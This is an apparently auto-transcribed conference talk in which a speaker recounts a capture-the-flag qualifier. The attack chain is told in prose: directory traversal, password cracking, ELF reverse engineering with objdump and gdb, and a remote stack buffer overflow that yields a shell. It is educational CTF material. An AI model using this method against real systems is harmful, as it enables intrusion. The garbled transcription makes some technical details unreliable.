 So, let's just begin. You don't like the music? Can somebody make me more important than the music? Very good. Now, the music was to keep you guys kind of from getting out of hand, because you're all real patient and docile at the moment, right? Yeah. Well, it wasn't my fault, just so you know. Don't blame me. We're in this together. Anyway, introduction. I'm Atlas. Nice to meet you all. There are only a couple differences from what you got on the CD than what you're going to see up here, namely my email address and my blog site. So make sure you write those down when they come up, because there's stuff later on in the slides that says, oh yeah, Atlas's brain dead tips to reverse engineering. They're on my blog later on tonight. They're not in the prezo. Okay? Good. Let me start out by saying that I am not better than any of you guys. This is not a, hey, look at me, I'm great talk. This is kind of what happened to me. I've been doing a lot of fun stuff. Most people in this room probably could do what I've been doing. I'm going to show you some of how. Is that good? I've been very blessed, very, just given a lot of curiosity, probably above average intelligence, but that probably describes everybody here, right? Except for the one guy in the back. All right, here it is. Write it down. Atlas at ratboy.com, I'm sorry, r4780y.com. The blog site, atlas.yada yada. A little bit about me. I was expecting to have a traveling microphone here. I'd like to move around. This is good. All right. A little bit about me. Dead, worked for IBM. I got a PC when I was seven. Started programming when I was eight. Thank you, brother, because my brother was teaching me. He's like eight years older than me. He's like, hey, look, you do the CLS, and it clears the screen. Sweet. So I've been programming since I was eight if you consider advanced basic programming. Some of you probably don't, but that's all right. Started college as a vocal performance major. You should have been gone. Anyway, you probably should have been before that. Hit pre-med before deciding that I had run away from my first love long enough. Got my bachelor's degree in computer science. Again, something you guys could have done, just something that I chose. After college, I got out, became a network engineer. Thought I was done with programming. Got into teaching, consulting, a lot of good money there. You don't have to know a lot about stuff to make a lot of money. You guys have probably put that together, haven't you? Well, that's where I was heading. Moved into telecom, where I got away from dealing with all the angry users a lot. And I moved into the more technical field, and you know what? I didn't even get a pay increase. So telecom introduced me to hacking and expose, because I started taking over the firewalls and doing all that stuff. After I'd been telecom a couple years, I went, my boss says, I want you to go to Sands. And I want you to take, think outside the box. Don't think about telecom. Think something else. I said hacker track, dude. Must be. And I took the hacker course with Ed Skotis, who promised me he was going to be here. And if he's here, can somebody point him out? And if he's not, everybody boo him when you see him later. His wife is pissed. So if you go check out the CTF, you'll probably know where to find him. Anyway, good friend of mine now. He was a mentor. Captured the flag, according to his teaching, was very different. So when I saw Def Con say, hey, we got this captured the flag, I'm thinking, dude, I know Metasploit. I know Nessus. I can find the vulnerabilities. I can go download some script. I'm in. All right. So I signed up really, really naively. I actually asked a bunch of guys to join a team, but that's a long story. So about June 3rd. So when prequels started last year, probably some of you guys knew that. June 3rd, I had forgotten. I said, okay, I got an email from these Kenshoto guys that says, 10 o'clock tonight I'm supposed to be doing something. Oh my gosh. We had visitors coming in from out of town, like four hours away. I had just adopted a little baby. Those are my kids. I'm a happy father. And we'd adopted, like, a week and a half before. So I've got the screaming baby. We got her out of the hospital. Not a good thing. So I was already used to no sleep, though. So sleep deprivation was good for my hacking career. But I was limited to about midnight to about five in the morning. All that baby status. You and me going to rumble. You can't have her back. To make matters worse, all my buddies that I said, hey, let's go be a team. They didn't show up. Kenshoto very nicely said, we'll give you the individual status so you can keep hacking. So briefly, who here show of hands? Who's done NASA's and maybe some Metasploit download some code and exploit machines? Excellent. Who remembers the first time they saw a sea prompt on their Linux box? Oh yeah. That is one of those turning points in life. It's very memorable. So I started out, cool. This is Caption the Flag. I'm going to learn about this box. The only thing we were told was, duzur.kenshoto.com is the only machine you can hack. Go ahead. Go forth and be malicious. Okay, that's cool. I can deal with that. So I start reconnaissance. Okay, reconnaissance. Going back to my Sands days. Well, I got everything that I got right there because they just brought up the site. Their email was it. So I move into scanning. Endmap scan showed up three ports. 22 SSH. Port 80 Apache. And 69, 69. Some sort of really weird sex port or something. Anybody will go to Shmucon this year? Alright. 22 was totally patched up to date. No known vulnerabilities. Apache, same thing. Going, what the heck? This kind of sucks. So I dig in. Maybe they got a web app. I check out the web app. Web app has a hidden field. Alright, I'm in now. I can understand this. Hidden field, I tweak around with it. Got a whole lot of errors until finally I find out file not found. Ooh, okay. So I was able to directory traversal up and view any file on the system. Didn't get me in, but it got me a lot. Including the password file. Little bit of cracking of the password file. Mind you, I zoomed right over the first key because it was stuck in the password file. It's too interesting getting the box. Anyway, in the password file, I throw it into John. You guys have probably done this. That's cool stuff. Really cool. John's great. John spits out immediately within one minute the root password and some break me password. No remote root. Suck. So I wasn't in. But this break me. Break me was kind of cool. I hit break me. My screen just went wild and it spit out the key. Key number two. Wait a minute. Where'd key number one go? Well, that was back in the Etsy password file. So key number two got spit out to me and I had to try it again to see what that was. Dumped it to a file. Turns out the login script dumps a base 64 encoded binary and then clears the screen a bunch of times and spits out the key. What the heck? Unbased 64. You know the pearl... What is that? Use the base 64 MIME thing and spit out a binary. I run file on it. Once you guys here with security expertise maybe in forensics, you know what file does. File spits out, oh my gosh it's an elf 32 binary. That's kind of scary. Okay. I'm trembling. I do strings on it and I see protocol failure. Oh crap. I remembered back during my initial scanning this port 69-69 when I hit it wrong it spits protocol failure. Oh. To quote one of my favorite lines out of speed oh darn. So at that point I was in mental surrender dude is like I have never considered writing a binary exploit. Never. That is the realm of the gods so I'm here to tell you it's not. Most of you could probably do it. Some of you probably have. So no disrespect to you guys. I had tons of fear, uncertainty, and doubt and it was well founded because I knew nothing. I was way out of my comfort zone. All I remembered was stuff from my forensics exam that taught me about Obstump and Reed Elf and a couple others that I just started poking around which is of course the next slide, sorry. And then of course I find a new hope. I thought I can do this. They're expecting me to do this. I better give it a shot or I'm just gonna give up and go crawling a hole. I had been reading a book that my in-laws bought me called Hacking the Art of Exploitation. Who here has that book? Excellent book. Excellent book. I got bored and I quit reading it at page 20 because it was basically recap. It's all theoretical. When I went back I found page 23 is when they get into writing buffer overflow exploits. I could have already had all this knowledge. So I start reading like crazy and I learn, oh my gosh, I can do this. Got on my Linux box. I was able to write an exploit. Sweet. I also found a paper on Exploite X on writing remote buffer overflow exploits. Very different game because then you got the whole network thing involved. But the thing that got me through it was sheer simple determination. I was looking really desperately for a good picture. I liked the bear. So that's pretty much all about me. Now we're really gonna get into what happened, what I learned. This is more of a oh my gosh I was really stupid type thing and I learned a lot in trying to brain dump some of that. What I used was Obstump. Really cool tool with a ton of ability to analyze and decipher binary executables. Works on Elf for Unix. Works on the PE file which is the standard Windows XE and DLL. I used Read Elf. Very limited. Obstump did everything that I really wanted and I got used to it. But Read Elf I had to poke into it. It's another very cool tool. Doesn't do the disassembly part but does just about everything else that Obstump does? I got to know GDB is the GNU debugger. I remember a long time ago copying and pasting stuff into debug for the DOS and Windows machines to hack up DOS axes. GDB, wow. If you talk to people in the industry they're gonna say yeah it's a piece of crap. And indeed it has a lot of weaknesses but it helped a lot and it taught me a lot. I worked with Ktrace and Kdump which is the kernel hooker as a program we'll talk to the kernel to make things calls like Read and close and printf and all that stuff. This sucker intercepts it and spits it out in a format that you can make some logical identification out of. And now I wrote a tool called Disass because I wasn't happy with what Obstump spit out especially for some binaries I wanted to know more and I wanted not to have to go through and manually do more. It's not an excellent tool, it helps me out. And in my release of the utility belt which you guys will find on my blog later on too you'll find Disass. Lots of fun. So we'll run through the tools just a little bit. Can any of you read this? Sorry, I'll summarize. This is Obstump the help output. Basically it allows you to look at the various header files in an executable which tells a ton of information. It allows you to disassemble the text or all sections. Anybody done assembly in here? Good, you'll like it better than the rest of you. If you don't know assembly there are tons of good books out there I could probably hook you up with some interesting stuff. Reverse engineering of a binary that you don't know you've really got to hunker down and learn your ASM. Obstump also spits out relocation points. So in a file you've got everything laid out in a very different fashion than it's going to appear in memory and some of the stuff that's copied into memory you want to call it by name the computer knows it by number and the relocation points allow you to basically do a DNS lookup on these locations. Obstump-d you probably can't see that either. You can read it on the PDF that you got on the CD. This is the very beginning of the disassembly for the bash shell. Again, read elves help you'll see a lot of interesting stuff. I print these out kind of as a placeholder so if you're reading the PDF later let's go play around with that a little bit because playing around is the name of the game. If you couldn't read that before you really can't read this. Again, it is on the PDF. This is a K trace output of stage three actually. I use a K trace call give it the process ID of the binary and it says okay we're going to call this and it returns this call this and it's calling select. Anybody done programming? Do you know what select does? Select if you've got like a file descriptor or something that points at an object like a file or a device Select will allow you to say is anything waiting to come in on this file descriptor? Very helpful. It goes down, it hits accept and if you're not into network programming you learn accept. It's the first call for anybody yell it out? What kind of connection? A TCP connection. You hit accept you've got a listener and then you call accept and it just kind of sits there and waits for somebody to connect. Hey, how's it going? Somebody connects accept returns an active file descriptor to a network socket. It's really cool stuff. You can read and write to it almost like you were reading so I know that that's where it starts the network connection it goes down and calls a fork which is a way of spinning off a little child process and running calls a oh it calls read wow go figure and it gives information on the memory location where that stuff goes. This is a wealth of information I'm not going to cover it as well as I should you'll see near the bottom bacon colon my name colon my password colon something else that's K-dump telling me what I put in there from the network connection my little client that I wrote spits that in there K-dump tells me that it also prints out all the stuff that's written back like down below it it says tag failure I screwed up I didn't know what I was doing I was just trying stuff so I made a conscious decision I'm going to work this until it kills me or until I get it so I bring up BSD on VMware run the stage 3 binary which used to be called binary in the previous slides I renamed it to stage 3 ran it with 69-69 because it wants a port number I wanted it to look just like it would on control box right? then I started K-trace K-trace watches how the program executes started netcat session who here use netcat let me hear it netcat is your friend very good some of you let's hear it again netcat is your friend less of course you're trying to shove pearl into it with unbuffered IO and anyway so I shove in netcat to 69-69 on the local host machine I'm hacking I give bacon my name my password something else and then I run K-dump and you see the output on the previous slide then I get into GDB very cool stuff very scary GDB stage 3 and then I put in the PID and what you'll see on there is an operating system a Unix call to grab the PID of stage 3 and I analyzed K-trace as I was too freaked out of assembly and actual reverse engineering so it's okay if you get to a point where you're like dude I'm just not comfortable with that I don't know what I'm doing that's cool that's fine do something keep going in the K-trace wait a minute I just saw most of that okay this is a continuation of what happened and so on nothing of interest so basically I'm playing dude where's my shell all over and I'm traipsing around using GDB traipsing around memory space trying to find my input it told me K-trace told me where the thing was going I could have probably found out from many other places a good idea of where to look but I didn't know and that's okay what's that this memory location keep going oh my gosh I ran into a boundary that can't actually spit back anything I was learning a lot about virtual memory virtual memory is basically the computer assigning a huge memory space to an application even though you don't have that much memory figuring that you'll run out of memory if you run out of memory and they want to give you as much leeway as they can I had no idea that all this stuff was identified in the elf binary itself the memory locations and so I just kept meandering obsdump-x would have told me a lot of what I need to know and so I'm going to share with you just a little bit about what it means obsdump-x means dump all header information not just the section not that section all of it it's broken into four parts oops the file header you've got an elf binary so it's an elf file it comes with its own little header at the very beginning that tells about the rest of what you're going to see in the file it also prints out the program headers the program headers say we're going to map this part of the binary to this part of virtual memory cool it also lists some dynamic stuff we require this library before we can run so if you don't have it boom you get an error and it also spits out section information assembly coders what section as oddball as it may sound what section does your code go in text okay yeah no I'm sorry your strings don't go in text code goes there so text is one of many sections so we're going to talk about some of that because in the end we're not talking about assembly being converted to machine language that's actually an oxymoron assembly is a representation of machine language it's a one to one there's no compiling going on the compilers take it from C down to assembler then it runs an assembler to convert the assembly into machine language to make an object and then the linker comes along as if we didn't do enough work the linker comes along and says yes you're blessed you may start and starts mapping real addresses based on requirements of other libraries it's very cool stuff I just bought at the prodding of my good friend Visigoth from capture the flag the kinshoto guy he's awesome at his prodding I just bought loaders and linkers or linkers and loaders whatever it's a really good book what's that linkers and loaders exceptional book really scary had I read this a year ago I would have been totally over my head so at the very beginning we get the file header the L file header it says hey this is a L32 made for the I386 instruction set okay that's cool so it's not like some Mac that run sorry not a MacTel but an actual Motorola Mac the old days it has some of the things that it can do and a starting address so after the loader stuff loads from the file into memory it drops the instruction pointer into this location kind of like in demolition man you know they had him all filled up with that really weird goopy stuff naked kind of scarring me and they drop this one little blue thing god only knows what it is boom hits and everything happens that's the starting address here the program headers you'll notice overlap there is some I'm sorry they encompass each other you'll notice on the left hand side there are different types of program headers I don't want you guys to be afraid here this is like part of the visual effect you've got different types of program headers the first one is the program header header well basically that defines where the program header is going to exist that's fine the two of most importance are the load header types these actually will load from the file into virtual memory space the first one starts off at byte zero in the file and it maps to 8048,000 this is a BSD box that number will vary and often times it'll look different between platforms not very important but just something you'll know so that actually maps your binary into virtual memory even including the elf header stuff that the old ass only cares about so if you go in GDB and show that memory location and keep going you'll actually be seeing the bytes from the executable file the second one starts at 8048000 and offset 2000 inside the binary file those are really round numbers you can add things so that it works out that way that plays into binary manipulation which this talk won't get into but if you ever go that far that's a lot of fun stuff the others you'll find map into the other loadables the loadables have certain flags basically saying I can read, I can write and I can execute this memory so if you want to put in your code you want to inject some code somewhere in an elf executable don't go for the second one in this example because it only has read and write permissions turned on I'm going way too deep aren't I I'll move on anyway the program headers are awesome and very important the dynamic section is quite interesting it lists several disparate things it's kind of like the miscellaneous area it says I need these libraries to run those are OS libraries they don't really mean that I have to install anything it talks about where the initialization is where the finishing is several other things I won't get into except maybe the GOT offset table and the PLT the program linkage table these are used by your program because you don't want to rewrite printf they are used by your program to jump to a local little section of code which gets transferred to wherever printf was mapped into memory cool stuff this is like a long time of research that you want to get into though if you're interested now we get into the sections what was that section again where your code goes text text is section 9 in this binary there are a lot of other sections you'll notice the PLT and you'll notice the where is it you'll notice the GOT and you'll notice a lot of other stuff read-only data, RO data is helpful when reversing a binary I won't go into the rest of them but it says the section of code or of whatever that's in the file it lives in the file with this offset and it needs to be mapped into memory here so again by looking at this information I can tell what virtual memory space looks like now remember when I was a year ago I didn't know this stuff I wanted to share this with you so that if you decide to take this assignment you won't have to do a lot of the meandering and silly pointless things that I did well they weren't pointless we also see the symbol table this can show everything from the section information and even your own written code functions methods and where they map to this is your little look up service area so when you want to know what lives where let's say I want to know where main lives in memory, boom right here I look for main as long as these symbols aren't stripped it helps me out every binary is different it's important to realize that if you're really good on one binary doesn't mean that they can't make a binary that you would love to hate and would make your eyes bleed I know last year they had a finger demon where everything was statically compiled it means these shared libraries were sucked into the overall binary and then they stripped all the symbols so we didn't know what was what real buzzer so was it a waste of time well obviously not because I'm here talking but no this was not a waste of time the most difficult thing for me to get over was the fact that I thought I needed to be doing something and having some tangible results for it to be worth my time but to this day you'll come in and watch us I lead the last place team for capture the flag we're called last place I'm not hoping to end up there but come check us out things that I learned during that meandering around memory space they still play into the way that I play the game and anything else that I do reverse engineering again I'm not going to go over all this this is for your own visual enjoyment later when you go back and you play with gdb these are some of my favorite parts of gdb that help me get around like a way to print out what's in memory and the way to print out what a register holds in it and how to set a breakpoint how to continue after a breakpoint because gdb's documentation is really good right uh-uh also you can set up memory locations you want to be spit out at you every time you stop after every instruction or after a breakpoint and that can be set up using the display just some really good stuff get into gdb on your favorite binary just plug this stuff in do a help on it help info help display help and I I also like to go through a binary as long as it's not too big my script will grab every call and create a breakpoint for it this is really good for initial reverse engineering I just hit continue and continue and I get to see what points in memory I'm stopping at for basically watching the logic and I'll sit there and I'll look at my deadlisting which is the disassembly and I'll watch what the program's doing as it runs I'll also start out with some very basic display settings I'll show me EIP in the surrounding area that's I'm sorry ESP in the surrounding area that's the stack pointer EBP which is the base pointer they both point to the stack but they give me a good idea of what's going on on the stack memory it prints out several registers this is what I use you can make your own you can download them as well so from that point I went into to call what I was doing fuzzing it was not anything but I started throwing data at it basically I was running Perl piping it to Netcat and seeing if I could break this thing and I did but yeah later on it didn't work out so well Metasploit I was strapping my Perl code which is very minimal a Metasploit exploit which is Perl there he was I have to learn Ruby now if I want to use it I suppose I took a Perl or a Metasploit exploit shellcode shoved it into my Perl program which then was shoved into Netcat pretty klugey but it works kinda and here's how it didn't work it's very important when writing a network exploit to run a sniffer any Perl coders here you can admit it Perl is great the very first line here dollar sign pipe well depending on this is a variable dollar sign pipe depending on what the value is your program may or may not use buffered I.O why is that important because if you do multiple line input onto a binary over the network you may want to give the service a little time in between lines because otherwise it may not work real well buffered I.O was saying okay I'm only gonna wait until you get to this much data before I send anything or until you close it so I was sending the first line and then waiting a second and it waited until I sent the second line to send the first line so you wanna run a sniffer to run a remote exploit I ended up because I didn't really realize what I was doing I was still learning Perl at the time I ended up just rewriting using Perl network code instead of piping it to netcat because I really needed that delay the binary couldn't handle just shoving stuff down it this will show up better in your pdf too sorry this is output from disas this is the disassembly it actually just harnesses obstump to grab all the information that it can out of the binary write up some tables and spit out basically a more human understanding of what's going on for example for those of you who can read this down to a call the very first break in the upper section is a call and it says call to and on this one it actually says which is shared library the first time I did that I don't know what I had wrong it didn't tell me what it was writing or what it was calling so disas spits out calls to the got table accept so I'm gonna run through try to just listen to me if you can't see it believe it or not I wasn't expecting this many people I thought maybe half of you so thanks for coming so we hit the accept that's the first call when we come back from accept what do we have we've got an active socket one that's been initialized and we got this two way communication the tcp3 way handshakes taking place all that good stuff little bit farther down it says ok call this child request subroutine it's just a handler so we jump into the child request subroutine that's the third section down on the right and child request does the little initialization routine every subroutine starts out with push esp out of the stack or I'm sorry push ebp out of the stack and then move the stack pointer into the ebp so what we did is we've created a new frame so that this stack area it belongs to the subroutine it's really cool very intelligent people made this up the same very intelligent people by the way decided to grow the stack down so that when we start putting in stuff in a buffer we can overwrite stuff lower on the stack like the return pointer so in here we call memset memset just basically clears out the memory space as I'll stick a zero here and all and then we call authenticate authenticate just goes through and it takes in the user ID and I hand it in and checks it against my user ID and password on the Unix system pretty cool stuff there was no vulnerabilities there though I'm skipping it comes back and it calls to a write moves down and accesses input buffer the thing that I want you to pay attention to here is right here this is like my brainchild it caused me great excruciating pain before I wrote this this s goes through a subroutine looks for local memory calls and calls to parameters that are passed in and it spits them out here sorry it's hexadecimal this is a signed hex number the big numbers the fff ones those are negative numbers the small ones are positive numbers so everything is based around that base pointer you know the stack base pointer we're talking about the base pointer is the delimiter if you're going against a parameter you can say the base pointer plus 8 or plus 12 or plus 16 if you're talking about a local variable the base pointer minus whatever that converts to and you know what I don't really care I do it in my head sometimes what's most important here is that this tells me between here this variable start and the next variable up which is below it on the stack is hexadecimal 40c for you guys who don't care about hex right now just consider that a right roughly hex 400 cause it's easy to say and then take a look over here where we do our read this is a call to a read so we've come into child request we cleared out the memory space we called authenticate and it says yes you're good or no you're bad and it spits out the results in this right and then we get a read call to call in to read in the next line and the parameters kind of cool interesting tidbit on a call where do you think the parameters are at whether they're being pushed on the stack in reverse order from the way they appear in a C program okay let me demonstrate call accepts what is it three parameters the first parameter happened to be ebp plus 8 oh that's the parameter to this subroutine okay the second parameter that's the file descriptor by the way the socket the second parameter which you go one up in your disassembly is a pointer to a memory location it's a can memory location it's not going to change 804A200 in this case and the third parameter who can tell me what a third parameter to a read call is network programmers anyone limitation how big will I allow this read to pull in the size of the buffer thank you can't read that probably but I'll read it to you hexadecimal 7FF just shy of hexadecimal 800 so we've got a storage location of roughly hex 400 and a read in of maximum of 800 okay do the math might not jump out at you the first time through but this is a good indicator that we might have something here it doesn't happen the overflow doesn't actually happen here though we've read in 7 up to 7FF bytes into this memory location which we looked up disass looked up and came up with a variable called input buffer cool I know what that is makes sense we follow along just a little bit farther and we see a call to s scan f anybody know what s scan f is what is it it it's like a formatted read what is the s scan f for string we're not reading from a keyboard we're not reading from a file descriptor we're reading from a string so what do we do our parameters say well our input string is 804A200 I know that's the input buffer our output is 804 9C0A and we've got some EAX which actually is just a pointer to a memory location inside the local sub oh wait do you think that might be the memory location that's like 400 bytes long I think so let's double check that one is called ffffbe8 thanks for staying as long as you guys did I enjoy your company and this is oh wait load effective address that's the assembly ffffbe8 before ebp well the address pointer of that is loaded into EAX so EAX is actually looking at a point in memory so we read in this input buffer using sscanf looking specifically for the word bacon which happened little trivia a lot of the kenshoto guys before they became kenshoto actually did a CTF team there called bacon the interview that I read said it was because it was the only thing that they all had in common they liked bacon so what do we have well we've got a potential buffer overflow here right why well we take a string in that can be for lack of a better word 800 bytes long hex and we shove it into a buffer that could be 400 bytes long hex well yeah but it's sscanf we're like formatted but sscanf will peel off what six bytes so clearly we've got issues here with the buffer overflow once overflowed you keep writing and you overwrite first of all whatever's between that variable and the base pointer you overwrite the previous frames base pointer because that lives right at the base pointer and then you overwrite ebp plus four you won't actually see ebp plus four mentioned anywhere in the code why well because ebp plus four is the return pointer it always is that's just the way that this works you know this because at the end of a at the end of a subroutine if you watch the leave and the ret function and I recommend that you do this holy crap I was just giving the warning it's time wow we gotta go anyway you overwrite the return pointer the subroutine keeps going you may have to actually manipulate what you stick in there to make it so that it's sane until it gets to the ret when it gets to the return it reads that in and eip the instruction pointer gets redirected to wherever you want it to go fun fun very cool I'm gonna slam through a couple more slides this is using my favorite gdb display variables so I'm doing 32 of these little four byte segments starting with the esp so this is esp blah blah blah esp plus hex 10, hex 20, hex 30, hex 40 meanwhile ebp minus 32 well why did I do that because I know that ebp is now going to be right here every time ebp is right there why do I care well because a lot of stuff that's in front of ebp I care about because that's local variables right that'll show up earlier a lot of stuff that shows up after I'm very interested in like this which happens to be the return pointer and when I'm done running the exploit here's my 90s not sled anybody hex 90 here's my shellcode actually sorry the shellcode started back here somewhere back here somewhere actually I overwrote here's the return pointer starting starting boom well that's where the return pointer is supposed to be what I ended up shoving in made it to the end of the subroutine they called leave which moves the base pointer stack pointer magic and then return starts execution of my program hello sex port 69 69 and the thriller conquest it worked ran the exploit printed out authenticate team 19 my password at the time it says okay hey that's cool then I feed in this bacon prefixed thing with a whole bunch of gibberish I started that cat go to 31337 on that system and I got a shell ID WD and here's stage 3 stage 4 through 7 lots of fun no time I did go on to complete them before CTF it took me a couple weeks because I was still really newbie stick with it if you're interested do it this is not the realm of the gods here guys this is the realm of curious determined people like you and me and the more of us that can do this stuff the more secure or insecure the world will be but it'll be you making the decision not other people so what's coming what's gonna happen to me well it's becoming an addictive habit I average 4 to 5 hours of sleep at night and half for the last year I will continue until my fingers and eyes no longer work because to me this is binary porn I'm not gonna go through this stuff read it download the toolkit it's not exceptional it helps me out hopefully it'll help you out maybe it'll help you get started cool tools just like an un or a base 64 encoder decoder just a lot of fun tools that I find useful format strings anybody love to hate format strings it's got a format string generator yeah I love it yeah let's give 30 seconds here and there is an outtake because about through day 4 something like that I was typing at 5 in the morning and I'll tell you what it's really funny when you wake up typing and it almost looks like words this is the result here's to complete the transformation no longer kitty thank you very much